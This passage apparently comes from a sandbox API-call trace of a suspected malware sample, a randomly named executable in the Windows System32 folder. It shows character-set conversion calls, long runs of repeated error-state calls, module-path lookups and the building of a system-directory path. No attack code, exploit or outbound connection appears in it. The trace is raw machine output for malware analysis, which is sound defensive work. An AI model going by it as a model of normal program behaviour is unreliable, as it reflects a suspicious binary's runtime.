!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x89\rCô,÷\"", lpUsedDefaultChar=0x0) returned 256 [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f5f4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f5f4, cbMultiByte=256, lpWideCharStr=0x22ef48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0033.041] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.041] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x22ed38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.041] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x22f3f4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x89\rCô,÷\"", lpUsedDefaultChar=0x0) returned 256 [0033.041] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.041] GetLastError () returned 0x0 [0033.041] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.042] GetLastError () returned 0x0 [0033.042] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.043] SetLastError (dwErrCode=0x0) [0033.043] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.044] SetLastError (dwErrCode=0x0) [0033.044] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.045] SetLastError (dwErrCode=0x0) [0033.045] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.046] SetLastError (dwErrCode=0x0) [0033.046] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.047] SetLastError (dwErrCode=0x0) [0033.047] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.048] SetLastError (dwErrCode=0x0) [0033.048] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.049] SetLastError (dwErrCode=0x0) [0033.049] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.050] SetLastError (dwErrCode=0x0) [0033.050] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.051] GetLastError () returned 0x0 [0033.051] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.052] SetLastError (dwErrCode=0x0) [0033.052] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.053] SetLastError (dwErrCode=0x0) [0033.053] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.054] GetLastError () returned 0x0 [0033.054] SetLastError (dwErrCode=0x0) [0033.055] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.055] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.062] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.062] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f770 | out: lpSystemTimeAsFileTime=0x22f770*(dwLowDateTime=0xe16e0f90, dwHighDateTime=0x1d3dfba)) [0033.063] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f6a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.063] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f590, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetLastError () returned 0x0 [0033.063] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.063] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.063] 